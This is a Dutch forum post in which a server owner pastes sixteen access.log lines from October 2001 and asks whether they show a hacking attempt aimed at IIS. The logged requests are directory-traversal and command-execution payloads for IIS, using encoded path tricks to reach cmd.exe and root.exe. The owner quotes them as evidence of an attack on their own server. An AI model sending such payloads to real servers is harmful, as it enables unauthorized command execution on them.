Ik zat vanmorgen te loeren richting mijn access.log en zag dit:
Wat is dit?? Poging tot hacken??
Edit: Of is dit een poging om cmd op te starten?? Lijkt mij dat die lamers denken dat dit een IIS server is ofso... Ben wel dom maar nie zo dom
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| 62.60.62.154 - - [30/Oct/2001:13:01:24 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 62.60.62.154 - - [30/Oct/2001:13:01:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 62.60.62.154 - - [30/Oct/2001:13:01:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 62.60.62.154 - - [30/Oct/2001:13:01:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 62.60.62.154 - - [30/Oct/2001:13:02:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 62.60.62.154 - - [30/Oct/2001:13:02:10 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 62.60.62.154 - - [30/Oct/2001:13:02:16 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 62.60.62.154 - - [30/Oct/2001:13:02:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 62.60.62.154 - - [30/Oct/2001:13:02:26 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 62.60.62.154 - - [30/Oct/2001:13:02:30 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 62.60.62.154 - - [30/Oct/2001:13:02:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 62.60.62.154 - - [30/Oct/2001:13:02:38 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 62.60.62.154 - - [30/Oct/2001:13:02:41 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 62.60.62.154 - - [30/Oct/2001:13:02:44 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 62.60.62.154 - - [30/Oct/2001:13:02:47 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 62.60.62.154 - - [30/Oct/2001:13:02:50 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 |
Wat is dit?? Poging tot hacken??
Edit: Of is dit een poging om cmd op te starten?? Lijkt mij dat die lamers denken dat dit een IIS server is ofso... Ben wel dom maar nie zo dom